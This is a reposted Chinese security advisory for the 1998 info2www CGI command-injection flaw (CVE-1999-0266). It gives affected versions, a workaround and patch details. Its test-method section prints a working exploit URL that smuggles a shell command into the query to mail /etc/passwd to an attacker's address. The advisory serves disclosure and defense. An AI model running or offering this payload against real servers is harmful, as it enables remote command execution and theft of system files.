Roar Smith info2www远程执行任意命令漏洞

2008-04-09 04:34:30来源:互联网 阅读 ()

新老客户大回馈,云服务器低至5折

Roar Smith info2www远程执行任意命令漏洞

发布日期:1998-03-03
更新日期:1998-03-03

受影响系统:
Roar Smith info2www 1.1
Roar Smith info2www 1.0
不受影响系统:
Roar Smith info2www 1.2
描述:
BUGTRAQ ID: 1995
CVE(CAN) ID: CVE-1999-0266

“info2www”是一个将GNU Info文本转化成HTML文件的CGI程序。

某些早期版本的info2www脚本实现上存在输入验证漏洞,远程攻击者可以利用此漏洞以Web进程的权限在主机上 执行任意系统命令。

问题在于程序脚本没有过滤用户输入中包含的一些shell元字符,远程攻击者可能以Web守护程序的权限(root或nobody)在主机上执行任意程序。


<*来源:Niall Smart (njs3@doc.ic.ac.uk)

链接:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0266
http://online.securityfocus.com/bid/1995/
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

Niall Smart (njs3@doc.ic.ac.uk)提供了如下测试方法:

访问以下URL可以将系统的passwd文件发送到攻击者的邮箱。

http://target/cgi-bin/info2www?'(../../../bin/mail your@email < /etc/passwd|)'

建议:
临时解决方法:

如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:

* 如果不需要使用info2www脚本,去除此脚本的执行权限或删除之。

厂商补丁:

Roar Smith
----------
程序作者已经在最新版的软件中修补了此安全漏洞,请到作者的主页下载:

http://www.gnu.org/directory/gnats.html

标签:

版权申明:本站文章部分自网络,如有侵权,请联系:west999com@outlook.com
特别注意:本站所有转载文章言论不代表本站观点,本站所提供的摄影照片,插画,设计作品,如需使用,请与原作者联系,版权归原作者所有

上一篇:Solaris 2.5/2.5.1平台gethostbyname()溢出漏洞

下一篇:Miva htmlscript远程察看任意文件漏洞